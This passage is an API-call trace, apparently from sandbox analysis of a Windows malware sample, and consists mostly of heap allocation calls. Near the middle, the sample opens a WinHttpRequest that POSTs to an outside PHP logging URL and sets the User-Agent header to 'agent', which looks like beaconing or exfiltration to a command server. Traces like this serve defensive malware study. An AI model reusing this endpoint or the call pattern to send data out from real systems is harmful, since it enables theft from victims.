nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0263.314] PeekMessageW (in: lpMsg=0x91f1dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f1dc) returned 0 [0263.314] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1ac8 [0263.314] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b08 [0263.314] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca7158 [0263.314] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1af8 [0263.314] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7158 | out: hHeap=0xc60000) returned 1 [0263.314] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1af8 | out: hHeap=0xc60000) returned 1 [0263.314] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b08 | out: hHeap=0xc60000) returned 1 [0263.315] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ac8 | out: hHeap=0xc60000) returned 1 [0263.315] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xcb3890 [0263.315] PeekMessageW (in: lpMsg=0x91f1dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f1dc) returned 0 [0263.315] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1ac8 [0263.315] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a300 [0263.315] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ac8 | out: hHeap=0xc60000) returned 1 [0263.315] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a918 [0263.315] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a300 | out: hHeap=0xc60000) returned 1 [0263.315] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcb3890 | out: hHeap=0xc60000) returned 1 [0263.315] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a300 [0263.315] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a918 | out: hHeap=0xc60000) returned 1 [0263.315] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9b318 | out: hHeap=0xc60000) returned 1 [0263.315] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2e8 | out: hHeap=0xc60000) returned 1 [0263.315] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a348 | out: hHeap=0xc60000) returned 1 [0263.315] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a330 | out: hHeap=0xc60000) returned 1 [0263.315] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc850e0 | out: hHeap=0xc60000) returned 1 [0263.315] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e4d8 | out: hHeap=0xc60000) returned 1 [0263.315] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2a0 | out: hHeap=0xc60000) returned 1 [0263.315] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a318 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a360 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b28 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e500 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a378 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b48 | out: hHeap=0xc60000) returned 1 [0263.317] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a378 [0263.317] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a360 [0263.317] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b48 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a300 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b48 | out: hHeap=0xc60000) returned 1 [0263.317] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a300 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a450 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a4c8 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a468 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a408 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a480 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a420 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a438 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3c0 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3d8 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.317] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e488 | out: hHeap=0xc60000) returned 1 [0263.317] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.317] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b48 [0263.318] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd8da58 [0263.318] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xa) returned 0xd7a3d8 [0263.318] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xcadc30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x91f3b8*="Open", cNames=0x1, lcid=0x800, rgDispId=0x91f4bc | out: rgDispId=0x91f4bc*=1) returned 0x0 [0263.318] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3d8 | out: hHeap=0xc60000) returned 1 [0263.318] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xcadc30, iTInfo=0x0, lcid=0x800, ppTInfo=0x91f3b0 | out: ppTInfo=0x91f3b0*=0xea4524) returned 0x0 [0263.325] ITypeInfo:RemoteGetTypeAttr (in: This=0xea4524, ppTypeAttr=0x91f3a8, pDummy=0x356310 | out: ppTypeAttr=0x91f3a8, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.325] ITypeInfo:LocalGetIDsOfNames (This=0xea4524) returned 0x0 [0263.325] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x0, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.329] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xcc61b8 [0263.329] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x1, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.329] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xc9b318 [0263.329] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x2, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.329] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xc9b318 [0263.329] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x3, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.329] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xcc61b8 [0263.329] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x4, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.329] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xcc61b8 [0263.329] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x5, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.329] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe6b5b8 [0263.329] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x6, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.329] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.330] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x7, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.330] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xcc61b8 [0263.330] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x8, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.330] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xcc61b8 [0263.330] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x9, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.330] ITypeInfo:LocalReleaseTypeAttr (This=0xea4524) returned 0xe4f2d8 [0263.330] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xcc61b8 [0263.330] WinHttpRequest:IUnknown:Release (This=0xea4524) returned 0x1 [0263.330] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x44) returned 0xed33a8 [0263.330] WinHttpRequest:IDispatch:Invoke (in: This=0xcadc30, dispIdMember=1, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x91f4a0*(rgvarg=([0]=0xed33ac*(varType=0xb, wReserved1=0x0, wReserved2=0x61bc, wReserved3=0xcc, varVal1=0x0, varVal2=0x0), [1]=0xed33bc*(varType=0x8, wReserved1=0xe8, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xed33cc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x91f468, puArgErr=0x91f4b0 | out: pDispParams=0x91f4a0*(rgvarg=([0]=0xed33ac*(varType=0xb, wReserved1=0x0, wReserved2=0x61bc, wReserved3=0xcc, varVal1=0x0, varVal2=0x0), [1]=0xed33bc*(varType=0x8, wReserved1=0xe8, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xed33cc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x91f468*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x91f4b0*=0x2b5995) returned 0x0 [0263.334] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd8da58 | out: hHeap=0xc60000) returned 1 [0263.334] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a348 [0263.334] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2e8 [0263.334] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a78 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed33a8 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b48 | out: hHeap=0xc60000) returned 1 [0263.335] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a348 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a510 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b38 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3a8 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a390 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe3cd38 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ad8 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a360 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a378 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a300 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e4b0 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18d8 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2e8 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a78 | out: hHeap=0xc60000) returned 1 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.335] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0263.335] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1a78 [0263.335] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.335] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca18d8 [0263.335] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xedf188 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e4b0 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a3f0 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2e8 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a300 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a378 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a360 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a390 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1ad8 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3a8 [0263.336] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ad8 | out: hHeap=0xc60000) returned 1 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d528 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a510 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a348 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1ad8 [0263.336] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3a8 | out: hHeap=0xc60000) returned 1 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3a8 [0263.336] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ad8 | out: hHeap=0xc60000) returned 1 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a918 [0263.336] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2b8 [0263.336] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3a8 | out: hHeap=0xc60000) returned 1 [0263.336] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2e8 | out: hHeap=0xc60000) returned 1 [0263.336] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.336] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a300 | out: hHeap=0xc60000) returned 1 [0263.336] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a360 | out: hHeap=0xc60000) returned 1 [0263.337] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a378 | out: hHeap=0xc60000) returned 1 [0263.337] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a390 | out: hHeap=0xc60000) returned 1 [0263.337] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e4b0 | out: hHeap=0xc60000) returned 1 [0263.337] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a390 [0263.337] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1ad8 [0263.337] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd8da58 [0263.337] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x22) returned 0xe903a8 [0263.337] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xcadc30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x91f3b8*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x91f4bc | out: rgDispId=0x91f4bc*=2) returned 0x0 [0263.337] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe903a8 | out: hHeap=0xc60000) returned 1 [0263.337] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xcadc30, iTInfo=0x0, lcid=0x800, ppTInfo=0x91f3b0 | out: ppTInfo=0x91f3b0*=0xea4524) returned 0x0 [0263.337] ITypeInfo:RemoteGetTypeAttr (in: This=0xea4524, ppTypeAttr=0x91f3a8, pDummy=0x356310 | out: ppTypeAttr=0x91f3a8, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.337] ITypeInfo:LocalGetIDsOfNames (This=0xea4524) returned 0x0 [0263.337] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x0, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.337] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe6b5b8 [0263.337] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x1, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.337] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xc9b318 [0263.337] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x2, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.337] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xc9b318 [0263.337] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x3, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.337] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe6b5b8 [0263.338] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x4, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.338] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe6b5b8 [0263.338] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x5, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.338] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe6b5b8 [0263.338] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x6, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.338] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.338] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x7, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.338] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe6b5b8 [0263.338] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x8, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.338] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe6b5b8 [0263.338] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x9, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.338] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe6b5b8 [0263.338] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0xa, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.338] ITypeInfo:LocalReleaseTypeAttr (This=0xea4524) returned 0xe4f2d8 [0263.338] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe6b5b8 [0263.338] WinHttpRequest:IUnknown:Release (This=0xea4524) returned 0x1 [0263.338] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x34) returned 0xed2ef8 [0263.338] WinHttpRequest:IDispatch:Invoke (in: This=0xcadc30, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x91f4a0*(rgvarg=([0]=0xed2efc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="agent", varVal2=0x0), [1]=0xed2f0c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x91f468, puArgErr=0x91f4b0 | out: pDispParams=0x91f4a0*(rgvarg=([0]=0xed2efc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="agent", varVal2=0x0), [1]=0xed2f0c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x91f468*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x91f4b0*=0x2b5995) returned 0x0 [0263.339] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd8da58 | out: hHeap=0xc60000) returned 1 [0263.339] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.339] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2e8 [0263.339] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b48 [0263.339] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed2ef8 | out: hHeap=0xc60000) returned 1 [0263.339] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a390 | out: hHeap=0xc60000) returned 1 [0263.339] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ad8 | out: hHeap=0xc60000) returned 1 [0263.339] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a390 [0263.339] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.339] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xedf188 | out: hHeap=0xc60000) returned 1 [0263.339] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18d8 | out: hHeap=0xc60000) returned 1 [0263.339] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a348 | out: hHeap=0xc60000) returned 1 [0263.339] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a510 | out: hHeap=0xc60000) returned 1 [0263.339] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2b8 | out: hHeap=0xc60000) returned 1 [0263.339] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a918 | out: hHeap=0xc60000) returned 1 [0263.339] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d528 | out: hHeap=0xc60000) returned 1 [0263.340] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a78 | out: hHeap=0xc60000) returned 1 [0263.340] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2e8 | out: hHeap=0xc60000) returned 1 [0263.340] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b48 | out: hHeap=0xc60000) returned 1 [0263.340] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a390 | out: hHeap=0xc60000) returned 1 [0263.340] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 